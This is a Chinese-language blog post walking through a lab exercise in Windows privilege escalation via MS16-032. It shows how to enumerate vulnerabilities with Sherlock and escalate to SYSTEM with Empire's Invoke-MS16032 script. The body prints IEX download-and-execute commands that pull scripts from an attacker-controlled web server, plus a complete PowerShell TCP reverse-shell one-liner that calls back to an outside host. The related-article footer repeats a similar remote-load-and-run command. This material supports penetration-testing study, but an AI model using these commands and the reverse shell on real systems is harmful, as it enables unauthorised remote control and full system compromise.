【安全】靶场实战-通过MS16-032提权

最新推荐文章于 2023-09-06 20:28:52 发布
最新推荐文章于 2023-09-06 20:28:52 发布
阅读量916 收藏 1
点赞数 1
分类专栏: 网络安全-基础补全 文章标签: 安全 windows
© "署名-非商用-相同方式共享 3.0" 转载请保留原文链接及作者。
本文链接:https://blog.csdn.net/qq_25924971/article/details/129333268
版权

个人介绍:188号安全攻城狮 【甲方安全工程师/CISSP/培训讲师】
目前恶补相关安全知识中,欢迎各位一起技术探讨。
每一次评论/点赞,都将成为我继续分享的动力

MS16-032简介

该漏洞影响从Vista到Windows 10的所有Windows版本(包括服务器版本)。

  • Windows Vista
  • Windows 7
  • Windows 8.1
  • Windows 10
  • Windows 2008 Server
  • Windows 2012 Server

利用条件:

  1. 目标系统需要有2个以上的CPU核心 。
  2. PowerShell v2.0及更高版本必须正在运行。

可根据MS16-032(KB3139914)补丁是否安装,来判断当前版本是否可利用。
接下来让我们进行靶场实操,在这里已经省略掉低权限shell获取部分。

靶场实操

1. 提权漏洞枚举

通常,我们可以使用Watson来进行内核类提权漏洞的枚举,但其要求.net框架4.5及以上。当.net框架版本不满足要求时,可以采用其旧版本Sherlock

在这里,我们先判断一下当前靶机的.net版本

cd C:\windows\microsoft.net\framework>
dir

在这里插入图片描述

如图所示,可以看到最高版本为4.0,所以在此我们选择Sherlock进行提权漏洞枚举。接下来,我们需要将Sherlock在远程服务器运行。在这里,我们先本地开启web服务,并放入Sherlock脚本。

python3 -m http.server 80

在这里插入图片描述
然后再已经获取到的低权限shell中,进行远程ps脚本下载&执行

# 远程加载模块
IEX(New-Object Net.WebClient).downloadstring('http://192.168.xxx.xxx/Sherlock.ps1')
# 查看当前可利用漏洞
Find-AllVulns

在这里插入图片描述
通过分析,有效信息如下,其中3个漏洞可利用(Appears Vulnerable状态)

Title      : Secondary Logon Handle
MSBulletin : MS16-032
CVEID      : 2016-0099
Link       : https://www.exploit-db.com/exploits/39719/
VulnStatus : Appears Vulnerable

Title      : Windows Kernel-Mode Drivers EoP
MSBulletin : MS16-034
CVEID      : 2016-0093/94/95/96
Link       : https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS1
             6-034?
VulnStatus : Appears Vulnerable

Title      : Win32k Elevation of Privilege
MSBulletin : MS16-135
CVEID      : 2016-7255
Link       : https://github.com/FuzzySecurity/PSKernel-Primitives/tree/master/S
             ample-Exploits/MS16-135
VulnStatus : Appears Vulnerable

2. 提权尝试

在这里,我们使用Empire项目中的MS16032的exp:Invoke-MS16032.ps1。然后保存至我们web目录下。

通过该脚本,可以创建一个system权限的新进程。在这里,我们利该漏洞,来创建一个powershell的反弹shell。nishang项目中,进行反弹Shell的源码获取Invoke-PowerShellTcpOneLine.ps1,并将其保存至我们的Web目录下。

$client = New-Object System.Net.Sockets.TCPClient('192.168.xxx.xxx',8080);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

然后回到在低权限shell中运行如下命令,加载提权脚本,并运行我们的木马

# 加载提权脚本
IEX(New-Object Net.WebClient).downloadstring('http://192.168.xxx.xxx/Invoke-MS16032.ps1')

# 提权,创建新进程并执行反弹shell
Invoke-MS16032 -Command "IEX(New-Object Net.WebClient).downloadstring('http://192.168.xxx.xxx/Invoke-PowerShellTcpOneLine.ps1')"

3. 其他坑点

需要判断一下当前powershell执行环境,如下图所示,当前powershell环境非64位环境。会导致该提权脚本产生异常。

[Environment]::Is64BitProcess

在这里插入图片描述

我们可以通过运行指定目录下的powershell,来切换为64位Shell。如下图所示,可以在通过执行sysnative下的进程,实现切换Shell。
在这里插入图片描述

C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe

在这里插入图片描述

参考资料

188号安全攻城狮
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ms16-032本地溢出漏洞
06-27
ms16-032本地溢出漏洞
QD77MS16 范例程序
03-17
QD77MS16 范例程序,本人上机测试过
M_D77MS16 FB库
11-23
M_D77MS16 FB库 M_D77MS16 FB库 M_D77MS16 FB库 M_D77MS16 FB库
Z1-AggressorScripts:适用于Cobalt Strike的插件
04-30
Z1-AggressorScripts 适用于Cobalt Strike 3.x & 4.x 的插件。 2020.12.20 更新: 更新工具。 2020.11.21 更新: 辅助模块的zip打包更换成uknow师傅的,内存加载无需上传。 限维持模块新增创建自启动运行,包括添加注册表,添加启动文件夹,创建启动服务三种方式。 2020.11.20 更新: 内网穿透模块新增支持nps。 frp由之前的upx压缩版本换成未压缩版,upx压缩后的frp32位和nps都会在360上报毒,索性全部换成原版。但是这就项目导致体积由20几M增加到了30几M,强烈建议到下载发行版压缩文件。 windows-npc64位通过cs上传后运行会报错,不知道是不是我个人环境问题,所以npc只上传32位,不影响使用。 获取可取漏洞 juicypotato MS14-058 MS15-051 MS16-016
记一次HW实战笔记 _ 艰难的爬坑1
08-03
1.ms16-075漏洞简介 2.wmic对目标系统进行漏洞补丁更新情况查看 3.msf反弹进行补丁枚举 4. windows-exploit-suggeste
Metasploit学习笔记(五)——Meterpreter后渗透之WMIC实战MS16-032本地溢出漏洞
Zichel77的博客
10-09 1297
比如KiTrap0D (KB979682) 、MS11-011 (KB2393802) 、MS11-080(KB2592799),然后使用没有编。因为虚拟机不怎么打补丁,所以我们可以使用很多EXP来,这里就用最新的MS16-032来尝试,对应的编号是KB3139914。可以看到目标机只打了3个补丁,要注意这些输出的结果是不能被直接利用的,使用的方式是去找的EXP,然后将系统已经安装的补。过程简单来说就是这几步,成功利用反弹shell后就是Meterpreter了。在WIN7中查看补丁信息。
利用WMIC实战MS16-032本地溢出漏洞
岁月净好
11-29 3084
假设此处我们通过了一系列的渗透测试得到了目标机器的Meterpreter Shell.   首先输入getuid命令查看已经获得的限,可以看到现在的限很低,是test限。 meterpreter > getuid Server username:WIN-S7TJ4B561MT\test 尝试输入getsystem命令,结果失败。 meterpreter > getsystem 接着查看系统的已达补丁,传统的方法是在目标机的CMD命令行下输入systeminfo命令,或者通过查
DAY28:Linux、Windows 系统
qq_49433473的博客
08-11 4663
Linux、Windows 系统、内核漏洞、脏牛(Dirty COW)、 SUID ,常用的可用于的程序`Nmap、Vim、find、Bash、More、Less、Nano、cp、awk` sudo、zip、计划任务取、Linux明文root密码、利用 root 无密码执行...
windows10
qq_54030686的博客
11-15 2343
即可查看到,这里目标是以Administartor限测试,这里不进行验证,我都有Administartor了,我直接msf下面getsystem即可,getsystem实际上也是令牌窃取。里面共描述了服务路径,文件限,计划任务,令牌窃取,图形化软件,应用组件安装等,这里只有令牌窃取需要管理员Administrator限,值得注意的是该限并不是管理员组中的其他用户。发现该文件以system限运行,而我们拥有对该文件的修改限,修改daclsve服务的具体执行文件,从而获取system限。
靶场小全
m0_57221101的博客
02-08 3786
说是linux但在整理的时候不自主的把windows的内容也写了进去,结果变成了大杂烩,也不知道是好还是不好你 https://github.com/sagishahar/lpeworkshop Windows: ​FuzzySecurity | Windows Privilege Escalation Fundamentals ​https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalatio..
Windows-数据库
最新发布
weixin_63960760的博客
09-06 95
UDF(user-defined function)是MySQL的一个拓展接口,也可称之为用户自定义函数,它是用来拓展MySQL的技术手段,可以说是数据库功能的一种扩展。通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令,将MYSQL账号root转化为系统system限。
利用ms16-032并打开3389端口
qq_45405155的博客
12-27 1318
利用ms16-032并打开3389端口 1、在VM中创建win 2003,在win2003上安装iis服务并开启服务 2、配置iis服务 3、上传源码及配置网站 给put文件设置限,添加iis访问限 设置默认访问页面 index.asp 访问192.168.x.x 4、修改checksql文件进行sql注入 判断注入点 http://192.168.8.130/shownews.asp?id=275 and 1=1 http://192.168.8.130/shownews.asp?id=2
MS16-023 + 信息收集 + 静默WinPcap安装 + WinDump抓包
publicStr的博客
08-01 1534
0x01 MS16-023 powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invok...
MS16-032 漏洞复现
weixin_34324081的博客
12-19 323
exploit-db的详情: https://www.exploit-db.com/exploits/39574/ Windows: Secondary Logon Standard Handles Missing Sanitization EoP Platform: Windows 8.1, Windows 10, not testing on Windows 7 Class: Elev...
MS16-032 漏洞复现
Adminxe的博客
06-14 2174
exploit-db的详情:https://www.exploit-db.com/exploits/39574/ 注意点:此漏洞影响从Vista到Windows 10的所有Windows版本(包括服务器版本)以及为了实现利用,因为PowerShell脚本指示需要满足以下要求:目标系统需要有2个以上的CPU核心 PowerShell v2.0及更高版本必须正在运行 此漏洞会影响以下Microsoft产品: Windows Vista Windows 7 Windows 8.1 Windows 1...
msf完整渗透测试
clayzx的博客
11-15 6488
从生成shell到远程连接 前言: 本来是最近打算把时间都花在学c上,渗透目前跟着老师学以后研究,但为了后续上课需求,就必须把这个给拿下了,于是花了今天一天的时间都在研究这个,写一篇详细的实验结果,为了给自己做笔记,也为了刚学msfconsole供一个资料参考。不说废话了,以下是我们这篇的目标: 1.生成shell 2.上shell 3.监听 4.拿到会话 5. 6.拿到密码 7.远程连接 首先此次实验需要准备一台kali的虚拟机和一台windows 7的
升】windows平台-项目&MSF&CS&溢出漏洞
今天是几号的博客
02-04 2251
简介:WES-NG是一个基于Windows系统信息实用程序输出的工具,该实用程序供了操作系统易受攻击的漏洞列表,包括对这些漏洞的任何利用。powershell运行(上传是为了收集系统打的补丁信息,作用等同于systeminfo,当无法上传文件时,可以用systeminfo中的信息覆盖KB.json文件)简介:这是一款基于主机的漏洞扫描工具,采用多线程确保可以快速的请求数据,采用线程锁可以在向sqlite数据库中写入数据避免。覆盖项目KB.json文件(一定格式的操作系统信息 补丁信息等)
Metasploit
weixin_44110913的博客
08-02 551
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 文章目录内核漏洞enum_patches模块Windows-Exploit-suggesterWindows C...
6.Xray工具可以发现下面哪种漏洞(2分) A.XSS B.shiro C. ms17-017 D. ms16-075
06-13
正确答案是 A。Xray 是一款功能强大的 Web 漏洞扫描工具,可以发现多种类型的漏洞,包括 XSS、SQL 注入、文件包含等。而在选项中,只有 XSS 漏洞是可以被 Xray 发现的,其他的漏洞类型不在 Xray 的扫描范围之内。因此,选项 A 是正确答案。选项 B 中的 shiro 是一个 Java 安全框架,不是漏洞类型。选项 C 和 D 中的 ms17-017 和 ms16-075 是 Windows 操作系统的漏洞编号,也不是漏洞类型。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值